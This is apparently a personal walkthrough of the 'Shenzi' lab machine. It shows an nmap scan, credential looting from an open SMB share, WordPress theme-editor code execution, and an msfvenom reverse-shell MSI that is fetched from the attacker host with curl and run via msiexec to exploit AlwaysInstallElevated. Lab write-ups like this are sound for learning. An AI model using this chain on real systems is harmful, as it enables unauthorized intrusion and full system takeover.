Machine Information
- Machine Name: Shenzi
- Machine Difficulty: Intermediate
Information Gathering
Classic nmap time
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
Nmap scan report for 192.168.206.55
Host is up, received user-set (0.020s latency).
Scanned at 2024-10-07 14:26:31 +08 for 573s
Not shown: 65521 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 125 FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
80/tcp open http syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.206.55/dashboard/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 56F7C04657931F2D0B79371B2D6E9820
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
443/tcp open ssl/http syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after: 2019-11-08T23:48:47
| MD5: a0a4:4cc9:9e84:b26f:9e63:9f9e:d229:dee0
| SHA-1: b023:8c54:7a90:5bfa:119c:4e8b:acca:eacf:3649:1ff6
| -----BEGIN CERTIFICATE-----
| MIIBnzCCAQgCCQC1x1LJh4G1AzANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDEwls
| b2NhbGhvc3QwHhcNMDkxMTEwMjM0ODQ3WhcNMTkxMTA4MjM0ODQ3WjAUMRIwEAYD
| VQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMEl0yfj
| 7K0Ng2pt51+adRAj4pCdoGOVjx1BmljVnGOMW3OGkHnMw9ajibh1vB6UfHxu463o
| J1wLxgxq+Q8y/rPEehAjBCspKNSq+bMvZhD4p8HNYMRrKFfjZzv3ns1IItw46kgT
| gDpAl1cMRzVGPXFimu5TnWMOZ3ooyaQ0/xntAgMBAAEwDQYJKoZIhvcNAQEFBQAD
| gYEAavHzSWz5umhfb/MnBMa5DL2VNzS+9whmmpsDGEG+uR0kM1W2GQIdVHHJTyFd
| aHXzgVJBQcWTwhp84nvHSiQTDBSaT6cQNQpvag/TaED/SEQpm0VqDFwpfFYuufBL
| vVNbLkKxbK2XwUvu0RxoLdBMC/89HqrZ0ppiONuQ+X2MtxE=
|_-----END CERTIFICATE-----
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_ssl-date: TLS randomness does not represent time
| http-title: Welcome to XAMPP
|_Requested resource was https://192.168.206.55/dashboard/
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
445/tcp open microsoft-ds? syn-ack ttl 125
3306/tcp open mysql? syn-ack ttl 125
| fingerprint-strings:
| DNSVersionBindReqTCP, FourOhFourRequest, HTTPOptions, LDAPSearchReq, NULL, RPCCheck, SSLSessionReq, TerminalServerCookie, X11Probe, drda, ibm-mqseries, informix, niagara-fox, tn3270:
|_ Host '192.168.251.206' is not allowed to connect to this MariaDB server
| mysql-info:
|_ MySQL Error: Host '192.168.251.206' is not allowed to connect to this MariaDB server
5040/tcp open unknown syn-ack ttl 125
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
Lets just start with web ports as usual.
Port 80
After exploring it, it seems like I have nothing from here. I then go through the other ports.
Port 139/445
Since SMB port is opened, I try if I could access anything without any credentials.
1
2
3
4
5
6
7
8
9
smbclient -NL //192.168.206.55/
Sharename Type Comment
--------- ---- -------
IPC$ IPC Remote IPC
Shenzi Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.206.55 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
It seems like there’s a share available for me.
1
2
3
4
5
6
7
8
9
10
smbclient -N //192.168.206.55/Shenzi
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu May 28 23:45:09 2020
.. D 0 Thu May 28 23:45:09 2020
passwords.txt A 894 Thu May 28 23:45:09 2020
readme_en.txt A 7367 Thu May 28 23:45:09 2020
sess_klk75u2q4rpgfjs3785h6hpipp A 3879 Thu May 28 23:45:09 2020
why.tmp A 213 Thu May 28 23:45:09 2020
xampp-control.ini A 178 Thu May 28 23:45:09 2020
Then its time to get everything and go through one by one.
1
2
3
4
5
6
5) WordPress:
User: admin
Password: FeltHeadwallWight357
After going through all the files, It seems like port 80 should have a wordpress website and the credentials was also given in passwords.txt. It seems like the only method is to just brute force or guess the directory which could lead to the wordpress website.
Port 80 (again)
I tried using common list to brute force the directory but nothing interesting was found. After struggling for awhile, I managed to get the wordpress website by going to /shenzi/ directory.
Since, the password was found, I then use the credentials to login to the wordpress admin site.
Since I manage to access the wordpress admin site, this should be typical RCE moment where I just edit some theme and execute it. Go to Appearance > Theme Editor and select 404 template to add your own malicious php payload.
After editing the files, click on the update file button and time to look for the editied file. In my case, the URL would be http://192.168.206.55/shenzi/wp-content/themes/twentytwenty/404.php.
Alright, I managed to get RCE. Now its time to just spawn a reverse shell.
1
2
3
4
5
6
7
8
9
10
11
rlwrap nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.45.191] from (UNKNOWN) [192.168.206.55] 51275
Microsoft Windows [Version 10.0.19042.1526]
(c) Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\shenzi\wp-content\themes\twentytwenty>whoami
whoami
shenzi\shenzi
C:\xampp\htdocs\shenzi\wp-content\themes\twentytwenty>
Since I’m not NT Authority System, time to privilege escalation
Privilege Escalation
Just explore winpeas result first and have a look at the information provided.
1
2
3
4
Checking AlwaysInstallElevated
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!
It seems like this could be the go to method to get administrator shell. To do so, I’ll need to generate a vulnerable MSI file using msfvenon.
1
2
3
4
5
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.191 lport=1235 -a x64 --platform windows -f msi -o test.msi
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: test.msi
After this, upload to the victim machine and try to execute it.
1
2
3
4
5
6
7
8
C:\Users\Public>curl 192.168.45.191:8001/test.msi -O
curl 192.168.45.191:8001/test.msi -O
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 156k 100 156k 0 0 1543k 0 --:--:-- --:--:-- --:--:-- 1560k
C:\Users\Public>msiexec /quiet /gn /i test.msi
msiexec /quiet /gn /i test.msi
Then the reverse shell should be spawned.
1
2
3
4
5
6
7
8
9
rlwrap nc -nvlp 1235
listening on [any] 1235 ...
connect to [192.168.45.191] from (UNKNOWN) [192.168.206.55] 51687
Microsoft Windows [Version 10.0.19042.1526]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
nt authority\system
Tada ~ Thats how I get the administrator shell.
Things I learned from this machine
- smb port is also a good port to check out when nothing from web port
- brute force directory can also include the title as it might be used as a directory name.
- classic wordpress RCE with admin creds
- AlwaysInstallElevated privilege escalation